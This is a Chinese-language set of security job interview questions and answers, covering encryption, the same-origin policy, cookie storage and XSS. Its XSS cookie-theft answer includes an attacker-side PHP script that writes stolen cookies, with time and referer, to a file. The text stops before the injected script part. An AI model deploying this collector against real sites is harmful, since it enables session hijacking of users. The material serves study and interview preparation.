网络安全、Web安全、渗透测试之笔经面经总结

本篇文章总结涉及以下几个方面：

对称加密非对称加密？

什么是同源策略？

cookie存在哪里？可以打开吗

xss如何盗取cookie？

tcp、udp的区别及tcp三次握手，syn攻击？

证书要考哪些？

DVWA是如何搭建的？

渗透测试的流程是什么

xss如何防御

IIS服务器应该做哪些方面的保护措施：

虚拟机的几种连接方式及原理

xss有cookie一定可以无用户名密码登录吗？

对称加密非对称加密？

对称加密：加解密用同一密钥，密钥维护复杂n（n-1）/2，不适合互联网传输密钥，加解密效率高。应用于加密数据。
非对称加密：公钥推不出私钥，每个用户一个非对称密钥对就可以，适合于互联网传输公钥，但是加密效率低，应用于数字签名及加密。

什么是同源策略？

为了防止不同域在用户浏览器中彼此干扰，浏览器对从不同来源（域）收到的内容进行隔离。
浏览器不允许任何旧有脚本访问一个站点的cookie，否则 ，会话容易被劫持。
只有发布cookie的站点能够访问这些cookie，只有通过该站点返回的页面所包含或加载的JavaScript才能访问cookie。

cookie存在哪里？可以打开吗

C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies
工具–文件夹选项–查看–将隐藏被保护的文件的对勾去掉就会看到cookies文件夹。

xss如何盗取cookie？

攻击者代码：

<?php

$cookie=$_GET['cookie'];
$time=date('Y-m-d g:i:s');
$referer=getenv('HTTP_REFERER');
$cookietxt=fopen('cookie.txt','a');
fwrite($cookietxt,"time:".$time." cookie:".$cookie." referer:".$referer.""); 注意双引号，容易出错
fclose($cookietxt);

?>

脚本端：